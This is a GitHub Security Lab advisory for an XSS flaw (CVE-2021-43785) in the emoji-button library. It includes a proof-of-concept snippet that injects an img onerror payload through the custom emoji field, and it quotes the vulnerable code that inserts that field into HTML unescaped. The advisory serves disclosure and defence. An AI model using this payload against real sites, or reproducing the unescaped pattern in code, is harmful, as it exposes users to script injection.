skip to content
Back to GitHub.com
Home Bounties Research Advisories CodeQL Wall of Fame Get Involved Events
December 1, 2021

GHSL-2021-1043: Cross-Site Scripting (XSS) in emoji-button - CVE-2021-43785

Agustin Gianni

Coordinated Disclosure Timeline

Summary

emoji-button is prone to XSS when handling untrusted emojis.

Product

emoji-button

Tested Version

v4.6.0

Details

Issue 1: XSS while handling emoji field (GHSL-2021-1043)

An attacker that is able to influence the field emoji when creating a rn instance is able to supply arbitrary html or javascript that will be rendered in the context of a user leading to XSS.

Proof of concept snippet:

const trigger = document.querySelector('#trigger');

const picker = new rn({
  custom: [
    {
      name: 'XSS triggering emoji',
      emoji: '"> <img src="foobar" onerror="alert(1);" /> <',
    }
  ]
});

trigger.addEventListener('click', () => picker.togglePicker(trigger));

Vulnerable code: emoji.ts

    if (this.emoji.custom) {
      content = this.lazy
        ? smile
        : `<img class="${CLASS_CUSTOM_EMOJI}" src="${this.emoji.emoji}">`;

Impact

This issue may lead to XSS

Resources

CVE

Resources

Credit

This issue was discovered by GitHub team member @erik-krogh (Erik Krogh Kristensen).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-1043 in any communication regarding this issue.